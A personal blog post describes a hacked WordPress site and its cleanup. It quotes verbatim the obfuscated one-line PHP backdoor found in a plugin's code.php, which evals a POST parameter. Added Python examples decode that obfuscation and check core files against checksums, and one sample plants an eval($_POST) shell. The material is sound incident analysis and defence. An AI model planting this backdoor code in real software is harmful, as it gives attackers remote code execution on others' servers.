I might not update much anymore, but I still want the blog to remain as a record of my travels. This afternoon I got an email from 1and1, my webhost, telling me that the following file was “under attack” –
~/blog/wp-content/plugins/health-check/code.php
I was surprised, and immediately went into my SFTP client to download and check the file. It was an old plugin; I must have installed it as part of the PHP4 -> 5 changeover I did sometime while I was in Jordan, to see what version was being reported. Tellingly, the plugin had never been updated, and I can’t seem to find it anymore in WordPress’s extension/plugin repository (although maybe this is it, as it’s named health-check in their database).
More chillingly, viewing the website in a browser yielded an error pertaining to a settings file in my wp-includes folder that was no longer functioning. White screen; that’s it.
When I tried to download code.php to my computer to inspect it, Windows Defender immediately flagged the file as malware and deleted it. Since I was on my work machine at the time, I had to talk to my colleague next door (who runs our antivirus scanner) to unblock the file! It was gobbledegook anyway – here’s what was inside it:
<?php $scol4 ="t_psroue" ; $fcen0= $scol4[3]. $scol4[0].$scol4[4]. $scol4[0].$scol4[5].$scol4[6]. $scol4[2]. $scol4[2].$scol4[7]. $scol4[4]; $jphf86 =$fcen0 ( $scol4[1].$scol4[2].$scol4[5].$scol4[3]. $scol4[0] ) ; if ( isset( ${ $jphf86 }['qd6e706' ]) ) { eval ( ${ $jphf86}[ 'qd6e706']); }?>
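That line is not really gobbledegook; it is a one-line backdoor hiding the two words it needs ("strtoupper" and "_post") by picking characters out of the seed string "t_psroue" by index. Here is a small decoder for that trick, written as an added example (it is not code from the post, from the plugin, or from WordPress); the function names and regular expressions are mine, the sample is a constructed copy of the post's code.php with the curly quotes straightened, and the decoder goes slightly beyond this one file by also handling strtolower/strrev and the other request superglobals, which variants of the same dropper use.

```python
"""Decode the string-index obfuscation used in the code.php above.

Added example; not code from the post or from any WordPress project. The
function names and regular expressions are my own, and the sample below is
the post's snippet with the extraction's curly quotes straightened.
"""
import re

# Constructed copy of the post's code.php contents.
SAMPLE = (
    '<?php $scol4 ="t_psroue" ; $fcen0= $scol4[3]. $scol4[0].$scol4[4]. $scol4[0].'
    '$scol4[5].$scol4[6]. $scol4[2]. $scol4[2].$scol4[7]. $scol4[4]; '
    '$jphf86 =$fcen0 ( $scol4[1].$scol4[2].$scol4[5].$scol4[3]. $scol4[0] ) ; '
    "if ( isset( ${ $jphf86 }['qd6e706' ]) ) { eval ( ${ $jphf86}[ 'qd6e706']); }?>"
)

# $name = "literal";
STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')
# $name = $src[3]. $src[0] ... ;   (characters picked out of an earlier string)
INDEX_CONCAT = re.compile(r'\$(\w+)\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);')
# $name = $func( $src[1].$src[2] ... )   (call through a variable function name)
CALL_CONCAT = re.compile(r'\$(\w+)\s*=\s*\$(\w+)\s*\(\s*((?:\$\w+\[\d+\]\s*\.?\s*)+)\)')
INDEX = re.compile(r'\$(\w+)\[(\d+)\]')
# eval( ${ $name }['param'] ) -- a variable-variable lookup into a superglobal
EVAL_VARVAR = re.compile(r"eval\s*\(\s*\$\{\s*\$(\w+)\s*\}\s*\[\s*['\"]([^'\"]+)['\"]")

# PHP string functions these droppers commonly route a name through.
PHP_FUNCS = {"strtoupper": str.upper, "strtolower": str.lower, "strrev": lambda s: s[::-1]}
REQUEST_SUPERGLOBALS = {"_POST", "_GET", "_REQUEST", "_COOKIE"}


def resolve_concat(expr, vars_):
    """Replace each $src[i] in expr with character i of the resolved $src."""
    return "".join(vars_[name][int(i)] for name, i in INDEX.findall(expr))


def decode(php):
    """Return {variable: resolved string} for the three obfuscation layers."""
    vars_ = {}
    for name, value in STRING_ASSIGN.findall(php):          # layer 1: the seed string
        vars_[name] = value
    for name, expr in INDEX_CONCAT.findall(php):            # layer 2: index shuffling
        vars_[name] = resolve_concat(expr, vars_)
    for name, func_var, expr in CALL_CONCAT.findall(php):   # layer 3: $f('_post')
        func = PHP_FUNCS.get(vars_.get(func_var, ""))
        if func is not None:
            vars_[name] = func(resolve_concat(expr, vars_))
    return vars_


def find_backdoor(php):
    """Return ('$_POST', 'param') if the file evals a request parameter, else None."""
    vars_ = decode(php)
    for var, param in EVAL_VARVAR.findall(php):
        target = vars_.get(var, "")
        if target in REQUEST_SUPERGLOBALS:
            return "$" + target, param
    return None


if __name__ == "__main__":
    for name, value in decode(SAMPLE).items():
        print(f"${name} = {value!r}")
    hit = find_backdoor(SAMPLE)
    if hit:
        print(f"backdoor: eval of {hit[0]}[{hit[1]!r}]")
```

Run against the sample, $fcen0 resolves to strtoupper, $jphf86 to _POST, and ${ $jphf86 } is PHP's variable-variable syntax for $_POST. So the whole file reduces to `if (isset($_POST['qd6e706'])) eval($_POST['qd6e706']);`: anyone who knows the parameter name can POST arbitrary PHP to code.php and have the server execute it. That is why Defender and 1and1 both reacted to it, and why "the file is under attack" really meant "the file is being used".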
Anyway, using this thread here, the easy fix was just to entirely purge the wp-admin and wp-includes folders and replace them with fresh downloads from wordpress.org. Once I did that, everything started working again. But it was quite a scare, especially since I cheaped out with 1and1 last year when they begged me to upgrade from my $4 a month hosting to something with backup capability. I run my own backups…sometimes. Heh. Guess I should do that now.
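Replacing wp-admin and wp-includes wholesale is a sound fix, but it helps to know which core files had actually been touched, and wordpress.org publishes a per-release manifest of file checksums for exactly that purpose (the API endpoint and its `{"checksums": {"relative/path": "md5"}}` shape are stated as I recall them and should be treated as an assumption). The checker below is an added example, not code from the post or from WordPress; the tree and manifest it runs on are constructed sample data, not real release hashes. Note the caveat built into it: wp-content/ is not in the manifest, so a dropped file like the plugin's code.php would never show up here and needs its own scan.

```python
"""Compare a WordPress install against a {path: md5} checksum manifest.

Added example, not from the post or from WordPress. A real manifest would
come from (assumed endpoint, as recalled):
  https://api.wordpress.org/core/checksums/1.0/?version=<ver>&locale=en_US
The tree and manifest built here are constructed sample data.
"""
import hashlib
import os
import tempfile


def md5_of(path):
    """MD5 of a file, read in chunks so large core files do not load whole."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_core(root, checksums):
    """Return {'modified': [...], 'missing': [...], 'unexpected': [...]}.

    'modified' and 'missing' come from the manifest; 'unexpected' is anything
    under wp-admin/ or wp-includes/ that the manifest does not list (a common
    place for dropped shells). wp-content/ is site-specific and NOT covered."""
    modified, missing, unexpected = [], [], []
    for rel, expected in sorted(checksums.items()):
        p = os.path.join(root, rel)
        if not os.path.isfile(p):
            missing.append(rel)
        elif md5_of(p) != expected:
            modified.append(rel)
    for sub in ("wp-admin", "wp-includes"):
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for name in files:
                rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
                if rel not in checksums:
                    unexpected.append(rel)
    return {"modified": modified, "missing": missing, "unexpected": sorted(unexpected)}


def build_demo_tree():
    """Constructed sample: a tiny 'install' with one tampered core file,
    one file that is not in the manifest, and one core file deleted."""
    root = tempfile.mkdtemp()
    clean = {
        "wp-includes/version.php": b"<?php $wp_version = '4.5.2';\n",
        "wp-admin/admin.php": b"<?php require_once 'admin-header.php';\n",
        "wp-settings.php": b"<?php // bootstrap\n",
    }
    # The manifest describes the clean release.
    checksums = {rel: hashlib.md5(data).hexdigest() for rel, data in clean.items()}
    # Now simulate what an intruder leaves behind (constructed, not real malware).
    on_disk = dict(clean)
    on_disk["wp-includes/version.php"] = b"<?php eval($_POST['x']); " + clean["wp-includes/version.php"]
    on_disk["wp-includes/class-wp-cache.php"] = b"<?php // file not in manifest\n"
    del on_disk["wp-admin/admin.php"]
    for rel, data in on_disk.items():
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as f:
            f.write(data)
    return root, checksums


if __name__ == "__main__":
    root, checksums = build_demo_tree()
    for kind, paths in verify_core(root, checksums).items():
        print(f"{kind}: {paths}")
```

On the constructed tree this reports wp-includes/version.php as modified, wp-admin/admin.php as missing and wp-includes/class-wp-cache.php as unexpected, which is the list you would want before deciding whether to restore a file or two or, as the post did, replace both directories outright. Anything it cannot see (wp-content/plugins, uploads, wp-config.php) still has to be reviewed by hand.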
Update, June 6th – Found it. I’m almost positive that this was one of the causes of the infection, as today I was notified of flaws in the WP-Mobile-Detector plugin. I applied the patch right away, although weirdly enough it still shows the “last modified” date for the resize.php file as being February 2016, not June.